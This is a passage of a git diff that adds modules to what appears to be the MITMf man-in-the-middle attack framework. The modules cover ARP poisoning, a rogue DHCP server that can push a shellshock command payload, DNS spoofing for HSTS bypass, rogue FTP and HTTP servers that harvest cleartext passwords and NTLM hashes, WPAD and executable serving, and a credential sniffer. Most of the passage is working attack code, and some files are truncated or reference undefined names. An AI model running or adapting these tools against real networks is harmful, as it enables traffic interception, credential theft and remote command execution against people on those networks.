headers[resp_header] + except KeyError: + return + header_val3 = header_val3.split(' ', 1) + + # The header value can either start with NTLM or Negotiate + if header_val3[0] == 'NTLM' or header_val3[0] == 'Negotiate': + try: + msg3 = base64.decodestring(header_val3[1]) + except binascii.Error: + return + return parse_ntlm_resp(msg3, seq) + +def parse_ntlm_resp(msg3, seq): + ''' + Parse the 3rd msg in NTLM handshake + Thanks to psychomario + ''' + + if seq in challenge_acks: + challenge = challenge_acks[seq] + else: + challenge = 'CHALLENGE NOT FOUND' + + if len(msg3) > 43: + # Thx to psychomario for below + lmlen, lmmax, lmoff, ntlen, ntmax, ntoff, domlen, dommax, domoff, userlen, usermax, useroff = struct.unpack("12xhhihhihhihhi", msg3[:44]) + lmhash = binascii.b2a_hex(msg3[lmoff:lmoff+lmlen]) + nthash = binascii.b2a_hex(msg3[ntoff:ntoff+ntlen]) + domain = msg3[domoff:domoff+domlen].replace("\0", "") + user = msg3[useroff:useroff+userlen].replace("\0", "") + # Original check by psychomario, might be incorrect? + #if lmhash != "0"*48: #NTLMv1 + if ntlen == 24: #NTLMv1 + msg = '%s %s' % ('NETNTLMv1:', user+"::"+domain+":"+lmhash+":"+nthash+":"+challenge) + return msg + elif ntlen > 60: #NTLMv2 + msg = '%s %s' % ('NETNTLMv2:', user+"::"+domain+":"+challenge+":"+nthash[:32]+":"+nthash[32:]) + return msg + +def url_filter(http_url_req): + ''' + Filter out the common but uninteresting URLs + ''' + if http_url_req: + d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff'] + if any(http_url_req.endswith(i) for i in d): + return + + return http_url_req + +def get_login_pass(body): + ''' + Regex out logins and passwords from a string + ''' + user = None + passwd = None + + # Taken mainly from Pcredz by Laurent Gaffie + userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name', + 'alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname', + 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', + 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', + 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in'] + passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', + 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password' + 'passwort', 'passwrd', 'wppassword', 'upasswd'] + + for login in userfields: + login_re = re.search('(%s=[^&]+)' % login, body, re.IGNORECASE) + if login_re: + user = login_re.group() + for passfield in passfields: + pass_re = re.search('(%s=[^&]+)' % passfield, body, re.IGNORECASE) + if pass_re: + passwd = pass_re.group() + + if user and passwd: + return (user, passwd) + +def printer(src_ip_port, dst_ip_port, msg): + if dst_ip_port != None: + print_str = '[{} > {}] {}'.format(src_ip_port, dst_ip_port, msg) + # All credentials will have dst_ip_port, URLs will not + + mitmf_logger.info("[NetCreds] {}".format(print_str)) + else: + print_str = '[{}] {}'.format(src_ip_port.split(':')[0], msg) + mitmf_logger.info("[NetCreds] {}".format(print_str)) diff --git a/core/netcreds/README.md b/core/netcreds/README.md new file mode 100644 index 0000000..e5e5871 --- /dev/null +++ b/core/netcreds/README.md @@ -0,0 +1,64 @@ +Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification. + +| Screenshots | +|:-----:| +| ![Screenie1](http://imgur.com/opQo7Bb.png) | +| ![Screenie2](http://imgur.com/Kl5I6Ju.png) | + +###Sniffs + +* URLs visited +* POST loads sent +* HTTP form logins/passwords +* HTTP basic auth logins/passwords +* HTTP searches +* FTP logins/passwords +* IRC logins/passwords +* POP logins/passwords +* IMAP logins/passwords +* Telnet logins/passwords +* SMTP logins/passwords +* SNMP community string +* NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc +* Kerberos + + +###Examples + +Auto-detect the interface to sniff + +```sudo python net-creds.py``` + +Choose eth0 as the interface + +```sudo python net-creds.py -i eth0``` + +Ignore packets to and from 192.168.0.2 + +```sudo python net-creds.py -f 192.168.0.2``` + +Read from pcap + +```python net-creds.py -p pcapfile``` + + +####OSX + +Credit to [epocs](https://github.com/epocs): +``` +sudo easy_install pip +sudo pip install scapy +sudo pip install pcapy +brew install libdnet --with-python +mkdir -p /Users//Library/Python/2.7/lib/python/site-packages +echo 'import site; site.addsitedir("/usr/local/lib/python2.7/site-packages")' >> /Users//Library/Python/2.7/lib/python/site-packages/homebrew.pth +sudo pip install pypcap +brew tap brona/iproute2mac +brew install iproute2mac +``` +Then replace line 74 '/sbin/ip' with '/usr/local/bin/ip'. + + +####Thanks +* Laurent Gaffie +* psychomario diff --git a/core/wrappers/__init__.py b/core/netcreds/__init__.py similarity index 100% rename from core/wrappers/__init__.py rename to core/netcreds/__init__.py diff --git a/core/protocols/__init__.py b/core/protocols/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/arp/ARPWatch.py b/core/protocols/arp/ARPWatch.py new file mode 100644 index 0000000..28f2473 --- /dev/null +++ b/core/protocols/arp/ARPWatch.py @@ -0,0 +1,86 @@ +import logging +import os +import sys +import threading + +from scapy.all import * + +mitmf_logger = logging.getLogger('mitmf') + +class ARPWatch: + + def __init__(self, gatewayip, myip, interface): + self.gatewayip = gatewayip + self.gatewaymac = None + self.myip = myip + self.interface = interface + self.debug = False + self.watch = True + + def start(self): + try: + self.gatewaymac = getmacbyip(self.gatewayip) + if self.gatewaymac is None: + sys.exit("[ARPWatch] Error: Could not resolve gateway's MAC address") + except Exception, e: + sys.exit("[ARPWatch] Exception occured while resolving gateway's MAC address: {}".format(e)) + + mitmf_logger.debug("[ARPWatch] gatewayip => {}".format(self.gatewayip)) + mitmf_logger.debug("[ARPWatch] gatewaymac => {}".format(self.gatewaymac)) + mitmf_logger.debug("[ARPWatch] myip => {}".format(self.myip)) + mitmf_logger.debug("[ARPWatch] interface => {}".format(self.interface)) + + t = threading.Thread(name='ARPWatch', target=self.startARPWatch) + t.setDaemon(True) + t.start() + + def stop(self): + mitmf_logger.debug("[ARPWatch] shutting down") + self.watch = False + + def startARPWatch(self): + sniff(prn=self.arp_monitor_callback, filter="arp", store=0) + + def arp_monitor_callback(self, pkt): + if self.watch is True: #Prevents sending packets on exiting + if ARP in pkt and pkt[ARP].op == 1: #who-has only + #broadcast mac is 00:00:00:00:00:00 + packet = None + #print str(pkt[ARP].hwsrc) #mac of sender + #print str(pkt[ARP].psrc) #ip of sender + #print str(pkt[ARP].hwdst) #mac of destination (often broadcst) + #print str(pkt[ARP].pdst) #ip of destination (Who is ...?) + + if (str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and str(pkt[ARP].pdst) == self.gatewayip and self.myip != str(pkt[ARP].psrc)): + mitmf_logger.debug("[ARPWatch] {} is asking where the Gateway is. Sending reply: I'm the gateway biatch!'".format(pkt[ARP].psrc)) + #send repoison packet + packet = ARP() + packet.op = 2 + packet.psrc = self.gatewayip + packet.hwdst = str(pkt[ARP].hwsrc) + packet.pdst = str(pkt[ARP].psrc) + + elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip != str(pkt[ARP].pdst)): + mitmf_logger.debug("[ARPWatch] Gateway asking where {} is. Sending reply: I'm {} biatch!".format(pkt[ARP].pdst, pkt[ARP].pdst)) + #send repoison packet + packet = ARP() + packet.op = 2 + packet.psrc = self.gatewayip + packet.hwdst = '00:00:00:00:00:00' + packet.pdst = str(pkt[ARP].pdst) + + elif (str(pkt[ARP].hwsrc) == self.gatewaymac and str(pkt[ARP].hwdst) == '00:00:00:00:00:00' and self.myip == str(pkt[ARP].pdst)): + mitmf_logger.debug("[ARPWatch] Gateway asking where {} is. Sending reply: This is the h4xx0r box!".format(pkt[ARP].pdst)) + + packet = ARP() + packet.op = 2 + packet.psrc = self.myip + packet.hwdst = str(pkt[ARP].hwsrc) + packet.pdst = str(pkt[ARP].psrc) + + try: + if packet is not None: + send(packet, verbose=self.debug, iface=self.interface) + except Exception, e: + mitmf_logger.error("[ARPWatch] Error sending re-poison packet: {}".format(e)) + pass diff --git a/core/protocols/arp/ARPpoisoner.py b/core/protocols/arp/ARPpoisoner.py new file mode 100644 index 0000000..122e3fd --- /dev/null +++ b/core/protocols/arp/ARPpoisoner.py @@ -0,0 +1,148 @@ +import logging +import threading +from time import sleep +from scapy.all import * + +mitmf_logger = logging.getLogger('mitmf') + +class ARPpoisoner(): + + def __init__(self, gateway, interface, mac, targets): + + self.gatewayip = gateway + self.gatewaymac = getmacbyip(gateway) + self.mymac = mac + self.targets = self.getTargetRange(targets) + self.targetmac = None + self.interface = interface + self.arpmode = 'rep' + self.debug = False + self.send = True + self.interval = 3 + + def getTargetRange(self, targets): + if targets is None: + return None + + targetList = list() + targets = targets.split(",") + for target in targets: + if "-" in target: + max_range = int(target.split("-")[1]) + octets = target.split("-")[0].split(".") + f3_octets = ".".join(octets[0:3]) + l_octet = int(octets[3]) + + for ip in xrange(l_octet, max_range+1): + targetList.append('{}.{}'.format(f3_octets, ip)) + else: + targetList.append(target) + + return targetList + + def start(self): + if self.gatewaymac is None: + sys.exit("[ARPpoisoner] Error: Could not resolve gateway's MAC address") + + mitmf_logger.debug("[ARPpoisoner] gatewayip => {}".format(self.gatewayip)) + mitmf_logger.debug("[ARPpoisoner] gatewaymac => {}".format(self.gatewaymac)) + mitmf_logger.debug("[ARPpoisoner] targets => {}".format(self.targets)) + mitmf_logger.debug("[ARPpoisoner] targetmac => {}".format(self.targetmac)) + mitmf_logger.debug("[ARPpoisoner] mymac => {}".format(self.mymac)) + mitmf_logger.debug("[ARPpoisoner] interface => {}".format(self.interface)) + mitmf_logger.debug("[ARPpoisoner] arpmode => {}".format(self.arpmode)) + mitmf_logger.debug("[ARPpoisoner] interval => {}".format(self.interval)) + + if self.arpmode == 'rep': + t = threading.Thread(name='ARPpoisoner-rep', target=self.poisonARPrep) + + elif self.arpmode == 'req': + t = threading.Thread(name='ARPpoisoner-req', target=self.poisonARPreq) + + t.setDaemon(True) + t.start() + + def stop(self): + self.send = False + sleep(3) + self.interval = 1 + + if self.targets: + self.restoreTarget(2) + + elif self.targets is None: + self.restoreNet(5) + + def poisonARPrep(self): + while self.send: + + if self.targets is None: + pkt = Ether(src=self.mymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mymac, psrc=self.gatewayip, op="is-at") + sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2 + + elif self.targets: + #Since ARP spoofing relies on knowing the targets MAC address, this whole portion is just error handling in case we can't resolve it + for targetip in self.targets: + try: + targetmac = getmacbyip(targetip) + + if targetmac is None: + mitmf_logger.error("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip)) + + elif targetmac: + send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="is-at"), iface=self.interface, verbose=self.debug) + send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="is-at", ), iface=self.interface, verbose=self.debug) + + except Exception, e: + mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e)) + pass + + sleep(self.interval) + + def poisonARPreq(self): + while self.send: + + if self.targets is None: + pkt = Ether(src=self.mymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mymac, psrc=self.gatewayip, op="who-has") + sendp(pkt, iface=self.interface, verbose=self.debug) #sends at layer 2 + + elif self.targets: + for targetip in self.targets: + try: + targetmac = getmacbyip(targetip) + + if targetmac is None: + mitmf_logger.error("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip)) + + elif targetmac: + send(ARP(pdst=targetip, psrc=self.gatewayip, hwdst=targetmac, op="who-has"), iface=self.interface, verbose=self.debug) + send(ARP(pdst=self.gatewayip, psrc=targetip, hwdst=self.gatewaymac, op="who-has"), iface=self.interface, verbose=self.debug) + + except Exception, e: + mitmf_logger.error("[ARPpoisoner] Exception occurred while poisoning {}: {}".format(targetip, e)) + pass + + sleep(self.interval) + + def restoreNet(self, count): + mitmf_logger.info("[ARPpoisoner] Restoring subnet connection with {} packets".format(count)) + pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.gatewaymac, psrc=self.gatewayip, op="is-at") + sendp(pkt, inter=self.interval, count=count, iface=self.interface, verbose=self.debug) #sends at layer 2 + + def restoreTarget(self, count): + for targetip in self.targets: + try: + targetmac = getmacbyip(targetip) + + if targetmac is None: + mitmf_logger.error("[ARPpoisoner] Unable to resolve MAC address of {}".format(targetip)) + + elif targetmac: + mitmf_logger.info("[ARPpoisoner] Restoring connection {} <-> {} with {} packets per host".format(targetip, self.gatewayip, count)) + + send(ARP(op="is-at", pdst=self.gatewayip, psrc=targetip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=targetmac), iface=self.interface, count=count, verbose=self.debug) + send(ARP(op="is-at", pdst=targetip, psrc=self.gatewayip, hwdst="ff:ff:ff:ff:ff:ff", hwsrc=self.gatewaymac), iface=self.interface, count=count, verbose=self.debug) + + except Exception, e: + mitmf_logger.error("[ARPpoisoner] Exception occurred while restoring connection {}: {}".format(targetip, e)) + pass diff --git a/core/protocols/arp/__init__.py b/core/protocols/arp/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/dhcp/DHCPServer.py b/core/protocols/dhcp/DHCPServer.py new file mode 100644 index 0000000..80ab8c6 --- /dev/null +++ b/core/protocols/dhcp/DHCPServer.py @@ -0,0 +1,107 @@ +import logging +import threading +import binascii +import random + +logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy +from scapy.all import * + +mitmf_logger = logging.getLogger('mitmf') + +class DHCPServer(): + + def __init__(self, interface, dhcpcfg, ip, mac): + self.interface = interface + self.ip_address = ip + self.mac_address = mac + self.shellshock = None + self.debug = False + self.dhcpcfg = dhcpcfg + self.rand_number = [] + self.dhcp_dic = {} + + def start(self): + t = threading.Thread(name="dhcp_spoof", target=self.dhcp_sniff, args=(self.interface,)) + t.setDaemon(True) + t.start() + + def dhcp_sniff(self, interface): + sniff(filter="udp and (port 67 or 68)", prn=self.dhcp_callback, iface=interface) + + def dhcp_rand_ip(self): + pool = self.dhcpcfg['ip_pool'].split('-') + trunc_ip = pool[0].split('.'); del(trunc_ip[3]) + max_range = int(pool[1]) + min_range = int(pool[0].split('.')[3]) + number_range = range(min_range, max_range) + for n in number_range: + if n in self.rand_number: + number_range.remove(n) + rand_number = random.choice(number_range) + self.rand_number.append(rand_number) + rand_ip = '.'.join(trunc_ip) + '.' + str(rand_number) + + return rand_ip + + def dhcp_callback(self, resp): + if resp.haslayer(DHCP): + xid = resp[BOOTP].xid + mac_addr = resp[Ether].src + raw_mac = binascii.unhexlify(mac_addr.replace(":", "")) + if xid in self.dhcp_dic.keys(): + client_ip = self.dhcp_dic[xid] + else: + client_ip = self.dhcp_rand_ip() + self.dhcp_dic[xid] = client_ip + + if resp[DHCP].options[0][1] is 1: + mitmf_logger.info("Got DHCP DISCOVER from: " + mac_addr + " xid: " + hex(xid)) + mitmf_logger.info("Sending DHCP OFFER") + packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') / + IP(src=self.ip_address, dst='255.255.255.255') / + UDP(sport=67, dport=68) / + BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) / + DHCP(options=[("message-type", "offer"), + ('server_id', self.ip_address), + ('subnet_mask', self.dhcpcfg['subnet']), + ('router', self.ip_address), + ('lease_time', 172800), + ('renewal_time', 86400), + ('rebinding_time', 138240), + "end"])) + + try: + packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server']))) + except KeyError: + pass + + sendp(packet, iface=self.interface, verbose=self.debug) + + if resp[DHCP].options[0][1] is 3: + mitmf_logger.info("Got DHCP REQUEST from: " + mac_addr + " xid: " + hex(xid)) + packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') / + IP(src=self.ip_address, dst='255.255.255.255') / + UDP(sport=67, dport=68) / + BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) / + DHCP(options=[("message-type", "ack"), + ('server_id', self.ip_address), + ('subnet_mask', self.dhcpcfg['subnet']), + ('router', self.ip_address), + ('lease_time', 172800), + ('renewal_time', 86400), + ('rebinding_time', 138240)])) + + try: + packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server']))) + except KeyError: + pass + + if self.shellshock: + mitmf_logger.info("Sending DHCP ACK with shellshock payload") + packet[DHCP].options.append(tuple((114, "() { ignored;}; " + self.shellshock))) + packet[DHCP].options.append("end") + else: + mitmf_logger.info("Sending DHCP ACK") + packet[DHCP].options.append("end") + + sendp(packet, iface=self.interface, verbose=self.debug) \ No newline at end of file diff --git a/core/protocols/dhcp/__init__.py b/core/protocols/dhcp/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/dns/DNSServer.py b/core/protocols/dns/DNSServer.py new file mode 100644 index 0000000..19ecd81 --- /dev/null +++ b/core/protocols/dns/DNSServer.py @@ -0,0 +1,101 @@ +################################################################################## +#DNS Stuff starts here(not Used) +################################################################################## + +#Function name self-explanatory + +class DNSServer(): + + def serve_thread_udp(host, port, handler): + try: + server = ThreadingUDPServer((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting UDP server on port %s: %s:" % (str(port),str(e)) + + def start(DNS_On_Off): + if DNS_On_Off == "ON": + t1 = threading.Thread(name="DNS", target=self.serve_thread_udp, args=("0.0.0.0", 53,DNS)) + t2 = threading.Thread(name="DNSTCP", target=self.serve_thread_udp, args=("0.0.0.0", 53,DNSTCP)) + for t in [t1, t2]: + t.setDaemon(True) + t.start() + + if DNS_On_Off == "OFF": + return False + +class ThreadingUDPServer(ThreadingMixIn, UDPServer): + + allow_reuse_address = 1 + + def server_bind(self): + UDPServer.server_bind(self) + +def ParseDNSType(data): + QueryTypeClass = data[len(data)-4:] + if QueryTypeClass == "\x00\x01\x00\x01":#If Type A, Class IN, then answer. + return True + else: + return False + +#DNS Answer packet. +class DNSAns(Packet): + fields = OrderedDict([ + ("Tid", ""), + ("Flags", "\x80\x10"), + ("Question", "\x00\x01"), + ("AnswerRRS", "\x00\x01"), + ("AuthorityRRS", "\x00\x00"), + ("AdditionalRRS", "\x00\x00"), + ("QuestionName", ""), + ("QuestionNameNull", "\x00"), + ("Type", "\x00\x01"), + ("Class", "\x00\x01"), + ("AnswerPointer", "\xc0\x0c"), + ("Type1", "\x00\x01"), + ("Class1", "\x00\x01"), + ("TTL", "\x00\x00\x00\x1e"), #30 secs, dont mess with their cache for too long.. + ("IPLen", "\x00\x04"), + ("IP", "\x00\x00\x00\x00"), + ]) + + def calculate(self,data): + self.fields["Tid"] = data[0:2] + self.fields["QuestionName"] = ''.join(data[12:].split('\x00')[:1]) + self.fields["IP"] = inet_aton(OURIP) + self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"])) + +# DNS Server class. +class DNS(BaseRequestHandler): + + def handle(self): + data, soc = self.request + if self.client_address[0] == "127.0.0.1": + pass + elif ParseDNSType(data): + buff = DNSAns() + buff.calculate(data) + soc.sendto(str(buff), self.client_address) + #print "DNS Answer sent to: %s "%(self.client_address[0]) + responder_logger.info('DNS Answer sent to: %s'%(self.client_address[0])) + +class DNSTCP(BaseRequestHandler): + + def handle(self): + try: + data = self.request.recv(1024) + if self.client_address[0] == "127.0.0.1": + pass + elif ParseDNSType(data): + buff = DNSAns() + buff.calculate(data) + self.request.send(str(buff)) + #print "DNS Answer sent to: %s "%(self.client_address[0]) + responder_logger.info('DNS Answer sent to: %s'%(self.client_address[0])) + + except Exception: + pass + +################################################################################## +#DNS Stuff ends here (not Used) +################################################################################## \ No newline at end of file diff --git a/core/protocols/dns/DNSnfqueue.py b/core/protocols/dns/DNSnfqueue.py new file mode 100644 index 0000000..ec1b255 --- /dev/null +++ b/core/protocols/dns/DNSnfqueue.py @@ -0,0 +1,130 @@ + +class DNSnfqueue(): + + hsts = False + dns = False + hstscfg = None + dnscfg = None + _instance = None + nfqueue = None + queue_number = 0 + + def __init__(self): + self.nfqueue = NetfilterQueue() + t = threading.Thread(name='nfqueue', target=self.bind, args=()) + t.setDaemon(True) + t.start() + + @staticmethod + def getInstance(): + if _DNS._instance is None: + _DNS._instance = _DNS() + + return _DNS._instance + + @staticmethod + def checkInstance(): + if _DNS._instance is None: + return False + else: + return True + + def bind(self): + self.nfqueue.bind(self.queue_number, self.callback) + self.nfqueue.run() + + def stop(self): + try: + self.nfqueue.unbind() + except: + pass + + def enableHSTS(self, config): + self.hsts = True + self.hstscfg = config + + def enableDNS(self, config): + self.dns = True + self.dnscfg = config + + def resolve_domain(self, domain): + try: + mitmf_logger.debug("Resolving -> %s" % domain) + answer = dns.resolver.query(domain, 'A') + real_ips = [] + for rdata in answer: + real_ips.append(rdata.address) + + if len(real_ips) > 0: + return real_ips + + except Exception: + mitmf_logger.info("Error resolving " + domain) + + def callback(self, payload): + try: + #mitmf_logger.debug(payload) + pkt = IP(payload.get_payload()) + + if not pkt.haslayer(DNSQR): + payload.accept() + return + + if pkt.haslayer(DNSQR): + mitmf_logger.debug("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype)) + if self.dns: + for k, v in self.dnscfg.items(): + if k in pkt[DNSQR].qname: + self.modify_dns(payload, pkt, v) + return + + payload.accept() + + elif self.hsts: + if (pkt[DNSQR].qtype is 28 or pkt[DNSQR].qtype is 1): + for k,v in self.hstscfg.items(): + if v == pkt[DNSQR].qname[:-1]: + ip = self.resolve_domain(k) + if ip: + self.modify_dns(payload, pkt, ip) + return + + if 'wwww' in pkt[DNSQR].qname: + ip = self.resolve_domain(pkt[DNSQR].qname[1:-1]) + if ip: + self.modify_dns(payload, pkt, ip) + return + + if 'web' in pkt[DNSQR].qname: + ip = self.resolve_domain(pkt[DNSQR].qname[3:-1]) + if ip: + self.modify_dns(payload, pkt, ip) + return + + payload.accept() + + except Exception, e: + print "Exception occurred in nfqueue callback: " + str(e) + + def modify_dns(self, payload, pkt, ip): + try: + spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\ + UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\ + DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd) + + if self.hsts: + spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip[0]); del ip[0] #have to do this first to initialize the an field + for i in ip: + spoofed_pkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=i)) + mitmf_logger.info("%s Resolving %s for HSTS bypass (DNS)" % (pkt[IP].src, pkt[DNSQR].qname[:-1])) + payload.set_payload(str(spoofed_pkt)) + payload.accept() + + if self.dns: + spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip) + mitmf_logger.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1])) + payload.set_payload(str(spoofed_pkt)) + payload.accept() + + except Exception, e: + print "Exception occurred while modifying DNS: " + str(e) \ No newline at end of file diff --git a/core/protocols/dns/__init__.py b/core/protocols/dns/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/ftp/FTPServer.py b/core/protocols/ftp/FTPServer.py new file mode 100644 index 0000000..98d65ae --- /dev/null +++ b/core/protocols/ftp/FTPServer.py @@ -0,0 +1,71 @@ +################################################################################## +#FTP Stuff starts here +################################################################################## + +class FTPServer(): + + def serve_thread_tcp(host, port, handler): + try: + server = ThreadingTCPServer((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + + #Function name self-explanatory + def start(FTP_On_Off): + if FTP_On_Off == "ON": + t = threading.Thread(name="FTP", target=self.serve_thread_tcp, args=("0.0.0.0", 21, FTP)) + t.setDaemon(True) + t.start() + + if FTP_On_Off == "OFF": + return False + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = 1 + + def server_bind(self): + TCPServer.server_bind(self) + +class FTPPacket(Packet): + fields = OrderedDict([ + ("Code", "220"), + ("Separator", "\x20"), + ("Message", "Welcome"), + ("Terminator", "\x0d\x0a"), + ]) + +#FTP server class. +class FTP(BaseRequestHandler): + + def handle(self): + try: + self.request.send(str(FTPPacket())) + data = self.request.recv(1024) + if data[0:4] == "USER": + User = data[5:].replace("\r\n","") + #print "[+]FTP User: ", User + responder_logger.info('[+]FTP User: %s'%(User)) + t = FTPPacket(Code="331",Message="User name okay, need password.") + self.request.send(str(t)) + data = self.request.recv(1024) + if data[0:4] == "PASS": + Pass = data[5:].replace("\r\n","") + Outfile = "./logs/responder/FTP-Clear-Text-Password-"+self.client_address[0]+".txt" + WriteData(Outfile,User+":"+Pass, User+":"+Pass) + #print "[+]FTP Password is: ", Pass + responder_logger.info('[+]FTP Password is: %s'%(Pass)) + t = FTPPacket(Code="530",Message="User not logged in.") + self.request.send(str(t)) + data = self.request.recv(1024) + else : + t = FTPPacket(Code="502",Message="Command not implemented.") + self.request.send(str(t)) + data = self.request.recv(1024) + except Exception: + pass + +################################################################################## +#FTP Stuff ends here +################################################################################## \ No newline at end of file diff --git a/core/protocols/ftp/__init__.py b/core/protocols/ftp/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/protocols/http/HTTPProxy.py b/core/protocols/http/HTTPProxy.py new file mode 100644 index 0000000..73db00a --- /dev/null +++ b/core/protocols/http/HTTPProxy.py @@ -0,0 +1,240 @@ +################################################################################## +#HTTP Proxy Stuff starts here (Not Used) +################################################################################## + +class HTTPProxy(): + + def serve_thread_tcp(host, port, handler): + try: + server = ThreadingTCPServer((host, port), handler) + server.serve_forever() + except Exception, e: + print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + + def start(on_off): + if on_off == "ON": + t = threading.Thread(name="HTTP", target=self.serve_thread_tcp, args=("0.0.0.0", 80,HTTP)) + t.setDaemon(True) + t.start() + + if on_off == "OFF": + return False + +class ThreadingTCPServer(ThreadingMixIn, TCPServer): + + allow_reuse_address = 1 + + def server_bind(self): + TCPServer.server_bind(self) + +#Parse NTLMv1/v2 hash. +def ParseHTTPHash(data,client): + LMhashLen = struct.unpack(' 24: + NthashLen = 64 + DomainLen = struct.unpack('2: + PostData = '[+]The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip()) + #print PostData + responder_logger.info(PostData) + +#Handle HTTP packet sequence. +def PacketSequence(data,client): + Ntlm = re.findall('(?<=Authorization: NTLM )[^\\r]*', data) + BasicAuth = re.findall('(?<=Authorization: Basic )[^\\r]*', data) + + if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data): + File = config.get('HTTP Server', 'ExecFilename') + buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File) + buffer1.calculate() + return str(buffer1) + + if ServeEXECAlwaysOrNot(Exec_Mode_On_Off): + if IsExecutable(FILENAME): + buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME) + buffer1.calculate() + return str(buffer1) + else: + buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME)) + buffer1.calculate() + return str(buffer1) + + if Ntlm: + packetNtlm = b64decode(''.join(Ntlm))[8:9] + if packetNtlm == "\x01": + GrabURL(data,client) + GrabCookie(data,client) + r = NTLM_Challenge(ServerChallenge=Challenge) + r.calculate() + t = IIS_NTLM_Challenge_Ans() + t.calculate(str(r)) + buffer1 = str(t) + return buffer1 + if packetNtlm == "\x03": + NTLM_Auth= b64decode(''.join(Ntlm)) + ParseHTTPHash(NTLM_Auth,client) + if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): + Message = "[+]WPAD (auth) file sent to: %s"%(client) + if Verbose: + print Message + responder_logger.info(Message) + buffer1 = WpadCustom(data,client) + return buffer1 + else: + buffer1 = IIS_Auth_Granted(Payload=HTMLToServe) + buffer1.calculate() + return str(buffer1) + + if BasicAuth: + GrabCookie(data,client) + GrabURL(data,client) + outfile = "./logs/responder/HTTP-Clear-Text-Password-"+client+".txt" + WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth))) + responder_logger.info('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth)))) + if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): + Message = "[+]WPAD (auth) file sent to: %s"%(client) + if Verbose: + print Message + responder_logger.info(Message) + buffer1 = WpadCustom(data,client) + return buffer1 + else: + buffer1 = IIS_Auth_Granted(Payload=HTMLToServe) + buffer1.calculate() + return str(buffer1) + + else: + return str(Basic_Ntlm(Basic)) + +#HTTP Server Class +class HTTP(BaseRequestHandler): + + def handle(self): + try: + while True: + self.request.settimeout(1) + data = self.request.recv(8092) + buff = WpadCustom(data,self.client_address[0]) + if buff and WpadForcedAuth(Force_WPAD_Auth) == False: + Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0]) + if Verbose: + print Message + responder_logger.info(Message) + self.request.send(buff) + else: + buffer0 = PacketSequence(data,self.client_address[0]) + self.request.send(buffer0) + except Exception: + pass#No need to be verbose.. + \ No newline at end of file diff --git a/core/protocols/http/HTTPSProxy.py b/core/protocols/http/HTTPSProxy.py new file mode 100644 index 0000000..754b5db --- /dev/null +++ b/core/protocols/http/HTTPSProxy.py @@ -0,0 +1,145 @@ +################################################################################## +#HTTPS Server stuff starts here (Not Used) +################################################################################## + +class HTTPSProxy(): + + 